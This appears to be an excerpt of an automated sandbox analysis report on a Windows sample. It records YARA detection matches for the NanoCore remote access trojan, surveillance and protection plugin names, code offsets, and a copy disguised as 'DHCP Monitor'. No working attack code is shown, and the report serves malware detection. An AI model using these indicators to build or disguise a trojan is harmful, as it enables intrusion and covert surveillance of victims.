        Source: 00000022.00000000.394464414.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000000.378843242.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000018.00000002.434654746.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000006.00000002.521004165.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
        Source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000027.00000000.423439487.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000006.00000002.513680149.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000013.00000002.409136026.00000000043D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001E.00000000.373615736.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000016.00000002.419521578.0000000004D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000000.393280850.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000027.00000002.453640867.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000000.00000002.310994827.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6284, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6752, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 2860, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 5308, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 5256, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: U7Ncg7oAyC.exe PID: 6568, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: dhcpmon.exe PID: 640, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D720E8
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D73040
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D70470
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D7B558
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D70FE8
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75340
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75330
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75138
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75128
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75738
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75558
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D75568
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D74A90
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D74A81
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D71BF8
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D73ED0
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D73EC1
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D70F3F
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_02D72F39
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_054D9770
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_054D0040
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_054D0006
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_09C90040
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 0_2_09C9003E
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 6_2_0283E480
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 6_2_0283E471
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 6_2_0283BBD4
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 6_2_062A03F0
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D50470
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D5B558
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D520E8
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D53040
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D50FE8
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55558
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55568
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55738
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55138
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55128
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55340
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D55330
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D53ED0
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D53EC1
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D50F3F
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D52F39
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D54A90
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D54A81
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_04D51BF8
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E0C080
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E00040
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E0BC58
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E05620
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E0561F
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E0C07F
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_07E0BC49
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_0929003F
        Source: C:\Users\user\Desktop\U7Ncg7oAyC.exeCode function: 19_2_09290040
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A3040
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A20F8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015AB558
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A0480
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A0FE8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5138
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5128
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A3018
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A20E8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5340
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5330
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5558
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5568
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A0470
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5748
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A5738
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A1BF8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A4A90
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A4A81
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A4DA2
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A1C08
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A0F3F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A2FEC
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A3ED0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_015A3EC2
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05710040
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_05710007
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_09B4003E
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 22_2_09B40040
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02663040
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_026620E8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02660470
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_0266B558
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02660FE8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665340
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665330
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02663017
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665128
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665138
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665738
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665568
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02665558
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02664A81
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02664A90
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02661BF8
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02663EC1
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02663ED0
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02660F3F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_02662FEB
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_04E149F4
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_04E16A21
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_04E16A30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_04F30040
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 24_2_04F30006
        Source: U7Ncg7oAyC.exeBinary or memory string: OriginalFilename vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000000.00000002.309699383.0000000004715000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000000.00000002.311185791.0000000004F10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000000.00000002.305800240.0000000000C24000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000000.00000000.246905121.0000000000B82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000000.00000003.269472442.0000000009BA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000000.00000002.313988013.00000000098D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFort.dll" vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exeBinary or memory string: OriginalFilename vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000000.298268399.0000000000522000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNanoProtectClient.dllT vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.519407419.0000000003A99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000006.00000002.517591077.0000000002A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNanoProtectClient.dllT vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exeBinary or memory string: OriginalFilename vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000013.00000002.382607982.00000000004C4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000013.00000000.317398335.0000000000422000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000013.00000002.393603690.0000000004035000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 00000013.00000002.411649755.0000000004830000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000000.374097639.0000000000D12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameContractArgumentValidatorAttrib.exe2 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416390532.00000000032E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNanoProtectClient.dllT vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNanoProtectClient.dllT vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exe, 0000001E.00000002.416870536.00000000042E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs U7Ncg7oAyC.exe
        Source: U7Ncg7oAyC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: LYKZypsugb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: dhcpmon.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: U7Ncg7oAyC.exeVirustotal: Detection: 43%
